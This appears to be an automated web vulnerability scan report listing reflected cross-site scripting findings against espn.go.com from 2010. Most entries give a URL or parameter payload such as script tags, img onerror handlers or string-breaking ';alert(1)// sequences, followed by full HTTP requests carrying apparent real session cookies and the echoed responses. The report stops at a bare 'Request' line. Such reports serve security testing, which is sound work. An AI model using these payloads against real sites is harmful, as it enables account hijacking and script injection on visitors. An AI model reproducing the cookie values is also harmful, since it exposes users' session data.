Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:21:59 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:21:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN14 Cache-Expires: Sat, 06 Nov 2010 14:30:19 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 1371
The value of the autostart request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59854"%3balert(1)//cc78248a523 was submitted in the autostart parameter. This input was echoed as 59854";alert(1)//cc78248a523 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:23:20 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:23:20 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 14:31:40 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 1371
The value of the player request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb4ee"%3balert(1)//e664ff0054e was submitted in the player parameter. This input was echoed as fb4ee";alert(1)//e664ff0054e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:20:43 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:20:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 14:29:03 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 1399
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42000"><img%20src%3da%20onerror%3dalert(1)>f1469c47fb3 was submitted in the REST URL parameter 5. This input was echoed as 42000"><img src=a onerror=alert(1)>f1469c47fb3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /espn3/index/_/sport/basketball42000"><img%20src%3da%20onerror%3dalert(1)>f1469c47fb3 HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 06:23:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 06:23:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sun, 07 Nov 2010 06:31:45 GMT Content-Length: 772619 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <meta name="description" CONTENT="Enjoy live streaming Basketball42000"><img src=a onerror=alert(1)>f1469c47fb3 online on ESPN3.com. Never miss a game!" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75580'%3b056a2319ce8 was submitted in the REST URL parameter 5. This input was echoed as 75580';056a2319ce8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /espn3/index/_/sport/basketball75580'%3b056a2319ce8 HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289100691517_533924%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%7D; jt_time=1289100691490; s_sess=%20s_ppv%3D95%3B; fsr.a=1289100690678; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020738304%7C1383628738304%3B%20s_c24_s%3DFirst%2520Visit%7C1289022538304%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022538320%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sun, 07 Nov 2010 06:23:50 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 06:23:50 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sun, 07 Nov 2010 06:32:10 GMT Content-Length: 772479 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <script type="text/javascript"> anTrackESPN3(0,'espn3',ud.name,'','','index','index',ud.name,'','en','basketball75580';056a2319ce8','');
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a7a3"><img%20src%3da%20onerror%3dalert(1)>00551600c81 was submitted in the REST URL parameter 5. This input was echoed as 8a7a3"><img src=a onerror=alert(1)>00551600c81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /espn3/index/_/sport/football8a7a3"><img%20src%3da%20onerror%3dalert(1)>00551600c81 HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009663813; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009661845; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 03:39:30 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 03:39:30 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 03:47:49 GMT Content-Length: 788700 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <meta name="description" CONTENT="Enjoy live streaming Football8a7a3"><img src=a onerror=alert(1)>00551600c81 online on ESPN3.com. Never miss a game!" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73637'%3ba4928c70f34 was submitted in the REST URL parameter 5. This input was echoed as 73637';a4928c70f34 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /espn3/index/_/sport/football73637'%3ba4928c70f34 HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009663813; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009661845; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 03:39:28 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 03:39:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Cache-Expires: Sat, 06 Nov 2010 03:47:48 GMT Content-Length: 788560 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]... <script type="text/javascript"> anTrackESPN3(0,'espn3',ud.name,'','','index','index',ud.name,'','en','football73637';a4928c70f34','');
The value of the pageType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae11a"%3balert(1)//70dba98dd9 was submitted in the pageType parameter. This input was echoed as ae11a";alert(1)//70dba98dd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the adminOver request parameter is copied into the XML document as plain text between tags. The payload 89c9d<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>99ff36eea82 was submitted in the adminOver parameter. This input was echoed as 89c9d<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>99ff36eea82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:17:38 GMT Content-Type: text/xml;charset=UTF-8 Last-Modified: Sat, 06 Nov 2010 14:17:38 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Cache-Expires: Sat, 06 Nov 2010 14:25:58 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 6403
The value of the height request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f548a'%3balert(1)//361c204b438 was submitted in the height parameter. This input was echoed as f548a';alert(1)//361c204b438 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=f548a'%3balert(1)//361c204b438&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:19:24 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:19:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN35 Cache-Expires: Sat, 06 Nov 2010 14:27:44 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2858
The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50a75'%3balert(1)//eef911a8eef was submitted in the id parameter. This input was echoed as 50a75';alert(1)//eef911a8eef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=565489750a75'%3balert(1)//eef911a8eef&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:17:41 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:17:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sat, 06 Nov 2010 14:26:01 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2620
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b19d"><script>alert(1)</script>5126c3ab88e was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videohub/mpf/frame/playerEmbed?id=56548979b19d"><script>alert(1)</script>5126c3ab88e&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:17:56 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:17:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 14:26:13 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2710
The value of the omniPageName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c58"%3balert(1)//be026dd05fd was submitted in the omniPageName parameter. This input was echoed as a6c58";alert(1)//be026dd05fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
